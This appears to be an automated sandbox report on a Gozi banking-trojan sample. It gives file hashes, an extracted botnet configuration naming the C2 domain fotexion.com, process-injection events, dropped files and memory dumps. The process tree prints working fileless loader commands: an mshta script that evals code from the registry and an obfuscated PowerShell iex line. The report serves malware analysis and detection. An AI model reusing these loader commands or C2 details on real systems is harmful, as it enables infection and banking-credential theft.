gozi | 40bbc905f9521a2892abf91df0ed1678caf43be3c05f2aaf4192707d84f94665

Analysis

max time kernel
152s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
13-10-2023 01:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

url/dettagli.url
Size

208B
MD5

1b903a8fc64800bc3601174a915c7e48
SHA1

26441d57d2fa5fc268660dfd894eb066fbda289a
SHA256

ee26c22ad61136470226197bd27f757e1f2a4c18b10d33bb6dbeeffceed8ec00
SHA512

a625f87c8c328aa18853d8a1ae54952d0459c6c7796b39dde55db3daa2652754e3c8351130acd037a35ebae6f87fca29fb5f7bef3f44973e902ec04dd2da421a

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

fotexion.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

fotexion.com

Attributes

base_path
/pictures/
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

79 1876 rundll32.exe

flow	pid	process
79	1876	rundll32.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	rundll32.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

1876 rundll32.exe

Suspicious use of SetThreadContext 7 IoCs

Processes:

rundll32.execontrol.exeExplorer.EXEpowershell.exe

description	pid	process	target process
PID 1876 set thread context of 1868	1876	rundll32.exe	control.exe
PID 1868 set thread context of 2636	1868	control.exe	Explorer.EXE
PID 1868 set thread context of 224	1868	control.exe	rundll32.exe
PID 2636 set thread context of 3612	2636	Explorer.EXE	RuntimeBroker.exe
PID 3080 set thread context of 2636	3080	powershell.exe	Explorer.EXE
PID 2636 set thread context of 3932	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 set thread context of 4868	2636	Explorer.EXE	RuntimeBroker.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

rundll32.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings rundll32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings	rundll32.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

Processes:

rundll32.exepowershell.exeExplorer.EXE

pid	process
1876	rundll32.exe
1876	rundll32.exe
3080	powershell.exe
3080	powershell.exe
3080	powershell.exe
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE
2636	Explorer.EXE

Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

rundll32.execontrol.exeExplorer.EXEpowershell.exe

pid process

1876 rundll32.exe
1868 control.exe
1868 control.exe
2636 Explorer.EXE
3080 powershell.exe
2636 Explorer.EXE
2636 Explorer.EXE

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	3080	powershell.exe
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

rundll32.exe

pid process

3788 rundll32.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

2636 Explorer.EXE

pid	process
3788	rundll32.exe

pid	process
2636	Explorer.EXE

Suspicious use of WriteProcessMemory 47 IoCs

Processes:

rundll32.execontrol.exerundll32.exemshta.exepowershell.execsc.execsc.exerundll32.execontrol.exeExplorer.EXE

description	pid	process	target process
PID 3788 wrote to memory of 8	3788	rundll32.exe	control.exe
PID 3788 wrote to memory of 8	3788	rundll32.exe	control.exe
PID 8 wrote to memory of 4820	8	control.exe	rundll32.exe
PID 8 wrote to memory of 4820	8	control.exe	rundll32.exe
PID 4820 wrote to memory of 1876	4820	rundll32.exe	rundll32.exe
PID 4820 wrote to memory of 1876	4820	rundll32.exe	rundll32.exe
PID 4820 wrote to memory of 1876	4820	rundll32.exe	rundll32.exe
PID 4512 wrote to memory of 3080	4512	mshta.exe	powershell.exe
PID 4512 wrote to memory of 3080	4512	mshta.exe	powershell.exe
PID 3080 wrote to memory of 1808	3080	powershell.exe	csc.exe
PID 3080 wrote to memory of 1808	3080	powershell.exe	csc.exe
PID 1808 wrote to memory of 2264	1808	csc.exe	cvtres.exe
PID 1808 wrote to memory of 2264	1808	csc.exe	cvtres.exe
PID 3080 wrote to memory of 4352	3080	powershell.exe	csc.exe
PID 3080 wrote to memory of 4352	3080	powershell.exe	csc.exe
PID 4352 wrote to memory of 412	4352	csc.exe	cvtres.exe
PID 4352 wrote to memory of 412	4352	csc.exe	cvtres.exe
PID 1876 wrote to memory of 1868	1876	rundll32.exe	control.exe
PID 1876 wrote to memory of 1868	1876	rundll32.exe	control.exe
PID 1876 wrote to memory of 1868	1876	rundll32.exe	control.exe
PID 1876 wrote to memory of 1868	1876	rundll32.exe	control.exe
PID 1876 wrote to memory of 1868	1876	rundll32.exe	control.exe
PID 1868 wrote to memory of 2636	1868	control.exe	Explorer.EXE
PID 1868 wrote to memory of 2636	1868	control.exe	Explorer.EXE
PID 1868 wrote to memory of 2636	1868	control.exe	Explorer.EXE
PID 1868 wrote to memory of 2636	1868	control.exe	Explorer.EXE
PID 1868 wrote to memory of 224	1868	control.exe	rundll32.exe
PID 1868 wrote to memory of 224	1868	control.exe	rundll32.exe
PID 1868 wrote to memory of 224	1868	control.exe	rundll32.exe
PID 1868 wrote to memory of 224	1868	control.exe	rundll32.exe
PID 1868 wrote to memory of 224	1868	control.exe	rundll32.exe
PID 2636 wrote to memory of 3612	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 3612	2636	Explorer.EXE	RuntimeBroker.exe
PID 3080 wrote to memory of 2636	3080	powershell.exe	Explorer.EXE
PID 3080 wrote to memory of 2636	3080	powershell.exe	Explorer.EXE
PID 2636 wrote to memory of 3612	2636	Explorer.EXE	RuntimeBroker.exe
PID 3080 wrote to memory of 2636	3080	powershell.exe	Explorer.EXE
PID 3080 wrote to memory of 2636	3080	powershell.exe	Explorer.EXE
PID 2636 wrote to memory of 3612	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 3932	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 3932	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 3932	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 3932	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 4868	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 4868	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 4868	2636	Explorer.EXE	RuntimeBroker.exe
PID 2636 wrote to memory of 4868	2636	Explorer.EXE	RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3612

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\url\dettagli.url
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3788

C:\Windows\System32\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\N8VHZYYG\dettagli[1].cpl",
2⤵
- Suspicious use of WriteProcessMemory
PID:8

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\N8VHZYYG\dettagli[1].cpl",
3⤵
- Suspicious use of WriteProcessMemory
PID:4820

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\N8VHZYYG\dettagli[1].cpl",
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1876

C:\Windows\system32\control.exe
C:\Windows\system32\control.exe -h
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1868

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
6⤵
PID:224

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4868

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3932

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2636

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cbwl='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cbwl).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD\\\LinkActive'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jiqhaf -value gp; new-alias -name qntrtlqd -value iex; qntrtlqd ([System.Text.Encoding]::ASCII.GetString((jiqhaf "HKCU:Software\AppDataLow\Software\Microsoft\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD").PlayPlay))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3080

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\drnb5jji\drnb5jji.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1808

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8004.tmp" "c:\Users\Admin\AppData\Local\Temp\drnb5jji\CSC4EC331EBB07B47B8B4F8E9A6803DA6CA.TMP"
5⤵
PID:2264

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\io1bczki\io1bczki.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4352

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8217.tmp" "c:\Users\Admin\AppData\Local\Temp\io1bczki\CSC87DAB90D6A724D30B29FA49ED154A8D.TMP"
5⤵
PID:412

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\N8VHZYYG\dettagli[1].cpl
Filesize
206KB

MD5
72e2a5c797954e895a41be5b20f867b2

SHA1
419aacfb3ccea9b08277bcc9405054fa4238a597

SHA256
858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0

SHA512
77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\N8VHZYYG\dettagli[1].cpl
Filesize
206KB

MD5
72e2a5c797954e895a41be5b20f867b2

SHA1
419aacfb3ccea9b08277bcc9405054fa4238a597

SHA256
858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0

SHA512
77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8004.tmp
Filesize
1KB

MD5
6ea624ff5de8a08a73ff1d9c0df1a9b7

SHA1
73667a2c836e0bfaf664cf871f5e1a0a3911aa90

SHA256
4ccf18ca06545dc9bf38a1e01d8f7b4d0bdca220526dbc9ce9c17aa28bc46c0a

SHA512
37f72423677f09b4eabe403079e6163c76d139421d755a08fd3ad4aba6a695b418200379421321f277657247fe93aa22ab36bb2717a0ffaf4eb04e68cc9f30c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8217.tmp
Filesize
1KB

MD5
fa6428ba1e5c186e37b495e2d8f074bd

SHA1
63da57f8fba7f343fa5b22cb139662d3a3610b15

SHA256
a31795606c251cd3e9aba3bfa8fc38b0fdfdb64d1f30014cb31e43996df0aed8

SHA512
8c091a10608d6115fae1de2a2353d5727c809abd253986820a86feac49e03d06f65d427d49dc5b1c9cec96852595dfb6ad8645f206e847c9a704fe148c5fbd7a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rgacucxi.fji.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\drnb5jji\drnb5jji.dll
Filesize
3KB

MD5
7c3efe1c6dc7728195ecb200f48ae949

SHA1
b3160b6a12ef6d3482b25f2789663a3182892740

SHA256
cc68433c77624700f68d1ab66d6f1fb2b94046a1e171abc750c0512ddf106452

SHA512
6e864681bc5bd4f9d7e6d45a6f75aa14bbd0cad59ecbada4a346fd0b3c7786266cd34d071a362419431b1f4f35a6f3969ed835b2a658afe43d40fbc25c285da5

Download Submit
C:\Users\Admin\AppData\Local\Temp\io1bczki\io1bczki.dll
Filesize
3KB

MD5
2fda3ef7f310df67ebabaa1e06907ccd

SHA1
b985fd8475168df139016be6383e6f674a9862b4

SHA256
c32a53cf2dc575f8d150575ab7b8badadbbe909a32bfb8f3b0bb63f2c6464662

SHA512
9b62ba5d3771951e313f8d953d9f7ecbb566219cb0cd0691e3149a5862a4ba0cc879601acfc0ecc5faf1fa63371e38737514ccca4496d2c18b089ba25e1e00bb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\drnb5jji\CSC4EC331EBB07B47B8B4F8E9A6803DA6CA.TMP
Filesize
652B

MD5
b04595013fb0256b1ec9d97130526333

SHA1
83820d76cc330603348e647508bf16d6f9808ad5

SHA256
bc7e467e6c6680a9d38c510a2fbd8c056e4f58153c603e93aeea663cb6f884ea

SHA512
9c6171f139af588ea71e241e3e74eae356d9334c6815cb5cc4e74c51d3c3957f530509d0678bea6bb776464b757839684a76e7c3100ece7eb1cf5a5edf05b848

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\drnb5jji\drnb5jji.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\drnb5jji\drnb5jji.cmdline
Filesize
369B

MD5
2d85bebe9ae39b02bc0c6cbf91027335

SHA1
afd85030134c768fa2849fafc01018a8430d78f0

SHA256
99f5b726a58217a59529d811453112becd5978dc90521afaf84fbc7b53fbc6ee

SHA512
9e6601ac07b5ac92f88bd3114eabdaf16ace10e8b721b8ba672d532fe56f5921e4465f3606a131eb1a328af70a333eb6b8862e49da0725d3635a7dc1f7fe69e9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\io1bczki\CSC87DAB90D6A724D30B29FA49ED154A8D.TMP
Filesize
652B

MD5
f860de4a2b813992c21c62ca6bc6ab12

SHA1
88d4a56f06d287197bcb406d08a2b2271aaf9425

SHA256
0aab3282dfd2dd67fd283f4526cc9408d5696e9aa9f04db1cb5ee973cbc76352

SHA512
be4684800b2eb64269514742719993fc40b827b63e2683d8145cb357d4b6d0b2a0c932a334c203d1c0bf50f0c5f3f540ddb69c069c856b0b415cef6a3c443daa

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\io1bczki\io1bczki.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\io1bczki\io1bczki.cmdline
Filesize
369B

MD5
e31702a5c32ca53ea1677ee531236c17

SHA1
80c34c198278916d3409e6d067239fe9ed514e2f

SHA256
6009d892e3c580681d510804f738dff8d25536328a422174e32a27b67faf5718

SHA512
d8601763777d6d887fef6029009d06e71e328f04656fadc8d186337392e7d321efc8dbbd196507d7fa167364074f62554a6c926d5af2108eb474fa9cc650eefc

Download Submit
memory/224-76-0x0000027500B30000-0x0000027500BD4000-memory.dmp

Filesize
656KB

Download
memory/224-77-0x0000027500A80000-0x0000027500A81000-memory.dmp

Filesize
4KB

Download
memory/224-82-0x0000027500B30000-0x0000027500BD4000-memory.dmp

Filesize
656KB

Download
memory/1868-61-0x0000000000170000-0x0000000000214000-memory.dmp

Filesize
656KB

Download
memory/1868-63-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/1868-83-0x0000000000170000-0x0000000000214000-memory.dmp

Filesize
656KB

Download
memory/1876-79-0x0000000002CD0000-0x0000000002CDE000-memory.dmp

Filesize
56KB

Download
memory/1876-7-0x0000000002C90000-0x0000000002CB9000-memory.dmp

Filesize
164KB

Download
memory/1876-8-0x0000000002CD0000-0x0000000002CDE000-memory.dmp

Filesize
56KB

Download
memory/1876-9-0x0000000002CD0000-0x0000000002CDE000-memory.dmp

Filesize
56KB

Download
memory/1876-10-0x0000000003140000-0x000000000314D000-memory.dmp

Filesize
52KB

Download
memory/2636-68-0x0000000009260000-0x0000000009304000-memory.dmp

Filesize
656KB

Download
memory/2636-88-0x000000000B100000-0x000000000B1A4000-memory.dmp

Filesize
656KB

Download
memory/2636-69-0x00000000013F0000-0x00000000013F1000-memory.dmp

Filesize
4KB

Download
memory/3080-26-0x000002537F0C0000-0x000002537F0D0000-memory.dmp

Filesize
64KB

Download
memory/3080-31-0x000002537F0C0000-0x000002537F0D0000-memory.dmp

Filesize
64KB

Download
memory/3080-24-0x00007FFCCCBA0000-0x00007FFCCD661000-memory.dmp

Filesize
10.8MB

Download
memory/3080-66-0x000002537F7E0000-0x000002537F81D000-memory.dmp

Filesize
244KB

Download
memory/3080-58-0x000002537F7D0000-0x000002537F7D8000-memory.dmp

Filesize
32KB

Download
memory/3080-33-0x000002537F0C0000-0x000002537F0D0000-memory.dmp

Filesize
64KB

Download
memory/3080-14-0x000002537F620000-0x000002537F642000-memory.dmp

Filesize
136KB

Download
memory/3080-25-0x000002537F0C0000-0x000002537F0D0000-memory.dmp

Filesize
64KB

Download
memory/3080-30-0x00007FFCCCBA0000-0x00007FFCCD661000-memory.dmp

Filesize
10.8MB

Download
memory/3080-27-0x000002537F0C0000-0x000002537F0D0000-memory.dmp

Filesize
64KB

Download
memory/3080-32-0x000002537F0C0000-0x000002537F0D0000-memory.dmp

Filesize
64KB

Download
memory/3080-108-0x00007FFCCCBA0000-0x00007FFCCD661000-memory.dmp

Filesize
10.8MB

Download
memory/3080-103-0x000002537F7E0000-0x000002537F81D000-memory.dmp

Filesize
244KB

Download
memory/3080-44-0x000002537F7B0000-0x000002537F7B8000-memory.dmp

Filesize
32KB

Download
memory/3612-90-0x000001E7B5E90000-0x000001E7B5E91000-memory.dmp

Filesize
4KB

Download
memory/3612-89-0x000001E7B62D0000-0x000001E7B6374000-memory.dmp

Filesize
656KB

Download
memory/3932-100-0x000001922A450000-0x000001922A451000-memory.dmp

Filesize
4KB

Download
memory/3932-98-0x000001922A490000-0x000001922A534000-memory.dmp

Filesize
656KB

Download
memory/4868-106-0x00000229F53D0000-0x00000229F53D1000-memory.dmp

Filesize
4KB

Download
memory/4868-105-0x00000229F75D0000-0x00000229F7674000-memory.dmp

Filesize
656KB

Download